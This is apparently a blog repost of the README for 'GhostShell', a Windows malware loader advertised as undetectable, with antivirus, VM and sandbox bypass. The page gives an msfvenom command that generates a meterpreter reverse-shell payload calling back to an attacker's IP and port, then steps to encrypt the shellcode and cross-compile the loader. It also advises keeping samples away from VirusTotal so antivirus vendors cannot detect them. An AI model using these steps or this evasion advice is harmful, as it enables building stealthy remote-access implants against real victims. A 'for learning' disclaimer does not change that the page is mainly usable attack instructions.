GhostShell is a Malware indetectable, with AV bypass techniques, anti-disassembly, etc. In this malware, are used some techniques to try bypass the AVs, VMs, and Sandboxes, with only porpuse to learning more. I’m not responsible for your actions.
Attention!!!
To check if the antivirus is detecting the malware, NEVER send it to the virustotal, IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN, to analyze, send it to https://www.hybrid-analysis.com/ and remember to check the option “Do not send my sample to non-affiliated third parties”, as in the example below.
Also Read – Faraday : Collaborative Penetration Test & Vulnerability Management Platform
Bypass Techniques
Generating the Shellcode
To generate the shellcode type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c
, copy the shellcode generated and encrypt it.
./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""
How to compile for Windows on Linux?
To compile for Windows on Linux, first, install mingw-w64: sudo apt-get install mingw-w64
, then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static
, and to 64 bits: x86_64-w64-mingw32 -o main.exe main.c -l psapi -static
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…